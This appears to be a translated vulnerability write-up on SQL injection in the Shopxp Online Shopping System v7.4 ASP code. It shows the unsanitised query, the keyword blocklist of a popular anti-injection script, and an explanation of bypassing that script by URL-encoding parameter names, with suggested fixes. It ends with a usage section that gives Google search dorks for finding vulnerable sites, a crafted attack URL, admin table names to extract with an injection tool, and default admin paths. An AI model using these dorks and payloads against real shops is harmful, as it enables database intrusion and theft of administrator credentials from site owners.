Shopxp Online Shopping System v7.4 SQL Injection Vulnerability

Source: Internet
Author: User
Tags: servervariables

Shopxp Online Shopping System v7.4 has the SQL injection vulnerability.
Problem file: xpCatalog_xpDesc.asp, xpCatalog_xpsmall_Desc.asp
Problem code:
<%
Dim shopxpbe_id, anclassname, shopx1__id, nclassname
Dim totalPut
Dim CurrentPage, TotalPages

If request("shopxpbe_id") <> "" Then
    shopxpbe_id = request("shopxpbe_id")
Else
    shopxpbe_id = 0
End If
If request("shopxpbe_id") = "" Then
    shopxpbe_id = 1
End If
If Not IsEmpty(request("page")) Then
    CurrentPage = CInt(request("page"))
Else
    CurrentPage = 1
End If

Set rs = server.CreateObject("adodb.recordset")
' shopxpbe_id is concatenated into the SQL statement as-is, without an integer cast
rs.open "select * from shopxp_btype where shopxpbe_id=" & shopxpbe_id, conn, 1, 1
anclassname = rs("shopxpbe_name")
rs.close
%>
shopxpbe_id is never cast to an integer before it reaches the query. Next we look at the anti-injection system, which appears to be the Maple Leaf online anti-injection script. Check the code:
Dim Fy_Url, Fy_a, Fy_x, Fy_Cs(), Fy_Cl, Fy_Ts, Fy_Zx
Fy_Cl = 2        ' handling method: 1 = show message, 2 = redirect, 3 = show message, then redirect
Fy_Zx = "../"    ' page to redirect to when an attack is detected
On Error Resume Next
' Raw query string: IIS does NOT URL-decode it
Fy_Url = Request.ServerVariables("QUERY_STRING")
Fy_a = Split(Fy_Url, "&")
ReDim Fy_Cs(UBound(Fy_a))
On Error Resume Next
' Parameter names are cut from the raw string, so an encoded name stays encoded
For Fy_x = 0 To UBound(Fy_a)
    Fy_Cs(Fy_x) = Left(Fy_a(Fy_x), InStr(Fy_a(Fy_x), "=") - 1)
Next
For Fy_x = 0 To UBound(Fy_Cs)
    If Fy_Cs(Fy_x) <> "" Then
        ' Request(name) returns the DECODED value; an encoded name matches nothing and yields ""
        If InStr(LCase(Request(Fy_Cs(Fy_x))), "'") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "and") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "select") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "update") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "chr") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "delete%20from") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), ";") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "insert") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "mid") <> 0 Or _
           InStr(LCase(Request(Fy_Cs(Fy_x))), "master.") <> 0 Then
            Select Case Fy_Cl
(remainder of the code omitted)

This anti-injection system seems to be very popular on the Internet, but it is flawed. The key line is Fy_Url = Request.ServerVariables("QUERY_STRING"): the data returned by Request.ServerVariables is the raw query string, with no URL decoding performed, so URL-encoding a parameter name bypasses the check. The following is lake2's analysis of the code:

"The idea is to first obtain the submitted data, split it into name/value pairs on "&", and then determine whether each value contains the defined keywords (this is simple; I only left "and"). If yes, it is injection.

At first glance, the value is checked, and it seems there is no problem. Well, yes, there is no problem with the value, but what about the name?

Its name/value pairs come from Request.ServerVariables("QUERY_STRING"). Sorry, there is a problem: Request.ServerVariables("QUERY_STRING") is the string submitted by the client, and the URL encoding is not automatically decoded here. Haha, if we encode the name and submit it again, we can bypass the check. For example, if the parameter is ph4nt0m=lake2 and lis0, the program can detect it. If you submit %50h4nt0m=lake2 and lis0 (%50 is the URL encoding for p), the program will check the value of %50h4nt0m, but %50h4nt0m has been converted to ph4nt0m, so the value of %50h4nt0m is null, and it bypasses the detection.

Wait, why can't the value be bypassed the same way, given that the name is not decoded? Because the value is obtained from Request(Fy_Cs(Fy_x)), which the server does decode.

How can we improve the program? You only need to obtain the decoded data submitted by the client: change the statement that collects the names to For Each SubmitName In Request.QueryString."
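To make the raw-name/decoded-value mismatch concrete, here is an added Python model of the filter logic described above (not the page's ASP code): parameter names cut from the raw QUERY_STRING, values looked up by decoded name, beside lake2's fix and the integer cast the page notes is missing for shopxpbe_id. The query strings are constructed samples.

```python
from urllib.parse import parse_qsl

# Keyword list taken from the page's anti-injection filter (matched after lower-casing).
BLACKLIST = ("'", "and", "select", "update", "chr", "delete%20from",
             ";", "insert", "mid", "master.")


def _hit(value: str) -> bool:
    return any(k in value.lower() for k in BLACKLIST)


def flawed_filter(raw_query: str) -> bool:
    """Model of the page's filter. Names come from the raw, undecoded
    QUERY_STRING (Split on '&', Left up to '='); values come from the
    decoded collection, like ASP's Request(name). True = flagged."""
    decoded = dict(parse_qsl(raw_query, keep_blank_values=True))
    for part in raw_query.split("&"):
        name = part.split("=", 1)[0]
        if not name:
            continue
        # A raw name such as 'shopxpbe_%69d' never matches the decoded
        # key 'shopxpbe_id', so the lookup yields "" and nothing is checked.
        if _hit(decoded.get(name, "")):
            return True
    return False


def fixed_filter(raw_query: str) -> bool:
    """lake2's fix: iterate the decoded collection itself
    (For Each SubmitName In Request.QueryString)."""
    return any(_hit(value) for _, value in parse_qsl(raw_query, keep_blank_values=True))


def safe_shopxpbe_id(raw_query: str, default: int = 1) -> int:
    """Root-cause fix for the page's bug: coerce shopxpbe_id to an integer
    before it is concatenated into SQL, falling back to the default."""
    value = dict(parse_qsl(raw_query, keep_blank_values=True)).get("shopxpbe_id", "")
    try:
        return int(value)
    except ValueError:
        return default


if __name__ == "__main__":
    # Constructed sample: the parameter name carries an encoded 'i' (%69).
    q = "Action_key_order=big&shopxpbe_%69d=79%20and%201=1"
    print("flawed filter flags it:", flawed_filter(q))   # False: bypassed
    print("fixed filter flags it: ", fixed_filter(q))    # True
    print("safe id used in SQL:   ", safe_shopxpbe_id(q))  # 1 (default)
```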

The usage is as follows:
Google: inurl:xpCatalog_xpDesc.asp?Action_key_order=big
inurl:Catalog_Desc.asp?Action_key_order=big (this looks like the commercial version)
Construct the following address:
http://www.xxx.com/xpCatalog_xpDesc.asp?Action_key_order=big&shopxpbe_%69d=79 (%69 is the URL encoding for i), and hand it to the tool, manually adding the table names shopxp_admin and shop_admin (for the commercial version).
The default backend is admin_shopxp or admin.
